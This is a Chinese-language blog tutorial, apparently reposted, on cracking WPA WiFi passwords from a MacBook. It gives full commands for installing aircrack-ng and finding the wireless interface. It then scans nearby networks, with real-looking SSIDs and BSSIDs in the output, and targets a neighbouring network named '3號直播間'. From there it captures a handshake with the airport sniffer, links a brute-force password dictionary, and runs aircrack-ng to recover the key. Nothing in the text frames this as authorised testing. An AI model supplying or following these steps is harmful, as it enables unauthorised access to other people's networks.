MACBOOK 破解wifi密碼


MACBOOK 破解wifi密碼

1 安裝homebrew

/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"

2 安裝aircrack-ng

sudo brew install aircrack-ng

安裝時可能會遇到相關路徑操作權限不足的問題,根據提示,直接復制命令執行,例如:

sudo chown -R $(whoami) /usr/local/lib /usr/local/lib/pkgconfig /usr/local/lib/python3.7/site-packages
chmod u+w /usr/local/lib /usr/local/lib/pkgconfig /usr/local/lib/python3.7/site-packages

安裝完成后,在使用時需要指定絕對路徑來調用 aircrack-ng ,此時為了方便,做以下操作:

# 創建路徑
halberd:bin halberd$ sudo mkdir -p /usr/local/sbin
# 修改路徑的屬組
halberd:bin halberd$ sudo chown -R halberd:admin /usr/local/sbin
# 建立文件連接
halberd:bin halberd$ brew link aircrack-ng
Linking /usr/local/Cellar/aircrack-ng/1.5.2... 54 symlinks created

后面就可以直接調用 aircrack-ng及相關命令了。

3 獲取wifi網卡信息

左鍵單南wifi圖標:

 

 在下拉框中選擇 "Open Network Preference":

 

 

 隨后點遷wifi后,點選右側框的"Advanced":

 

 

 接下來在新的窗口中選擇hardware 查看MAC地址:

 

 

找到mac地址后, 查看網卡設備名:

ifconfig |grep -i "98:5a:eb:8b:e1:9e" -A 4 -B 1

結果如下:

  halberd:tmp halberd$ ifconfig |grep -i "98:5a:eb:8b:e1:9e" -A 4 -B 1
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	ether 98:5a:eb:8b:e1:9e
	nd6 options=201<PERFORMNUD,DAD>
	media: autoselect (<unknown type>)
	status: inactive
en1: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500

由此確定wifi網卡的設備名是en0.

4 獲取所有可識別的wifi信息

halberd:tmp halberd$ sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s
Password:
                            SSID BSSID             RSSI CHANNEL HT CC SECURITY (auth/unicast/group)
                        3號直播間 dc:16:b2:5b:c9:9c -84  157     Y  CN WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
            AIHZ WaveLAN Network 54:a2:74:2d:8a:5f -79  149     Y  CN WPA2(PSK/AES/AES)
                       klbblm-sj 48:7d:2e:5e:76:7d -75  149     Y  CN WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
                   ChinaNet-QpNr 18:75:32:ad:25:d1 -58  9       Y  -- WPA(PSK/AES,TKIP/TKIP)
                        PublicRD 08:57:00:67:3a:c0 -67  6,+1    Y  -- WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
                      PublicRD03 34:96:72:a4:e1:ff -42  6,-1    Y  CN WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
                  Leave-me-alone 3c:46:d8:69:c9:9d -31  6,-1    Y  -- WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
            AIHZ WaveLAN Network 54:a2:74:2d:8a:50 -53  1       Y  CN WPA2(PSK/AES/AES)
                     celled_yang dc:fe:18:c6:62:fd -60  1,+1    Y  CN WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
                       klbblm-dn 48:7d:2e:5e:76:7b -58  11,-1   Y  CN WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
                             zzz 70:af:6a:00:63:c6 -75  11,-1   Y  -- WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
                        2號直播間 48:7d:2e:51:ea:9c -68  11      Y  -- WPA(PSK/AES/AES) WPA2(PSK/AES/AES)

其中特別注意的是channel ,后面的步驟需要用到。這里我將破解3號直接間的wifi密碼, 對應的channel 是157。

5 監聽wifi登錄信息

sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en0 sniff 157

當執行以上命令, 開始監聽以后, wifi的圖標會發生改變, 變成一個小眼睛一樣的圖標: 

在監聽過程中,假如有人登錄了該wifi, airport會將監聽到的包信息獲取到本地,並保存在/tmp路徑中。 文件命名格式為: airportSniffxxxx.cap ,在監聽過程中可隨時查看/tmp最新生成的文件 大小。可以多監聽一斷時間,只要有人登錄, 密碼信息就會被保存起來。

當獲取了信息后,可以使用 Ctrl-c 取消監聽。

在測試過程中,出現了 Segmentation fault: 11 錯誤,有可能是空指針問題。待解決。

6 查看是否獲取handshake信息

sudo aircrack-ng   /tmp/airportSniff8g0Oex.cap

如果沒有,則繼續執行上一步操作,繼續監聽。

7 獲取密碼字典

可以去github上搜索密碼字典,比如搜索 "爆破"。 也可以直接從https://github.com/rootphantomer/Blasting_dictionary 中下載,進行嘗試。

8 破解

sudo aircrack-ng -w <密碼文件> -b <BSSID>  <監聽信息文件>

破解完成后, 程序會輸出 "KEY FOUND! [xxxxxx]" [] 里的就是密碼。

如果沒破解出來,可以換個字典繼續嘗試破解。

Author: halberd.lee

Created: 2019-08-23 Fri 15:36

Validate


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM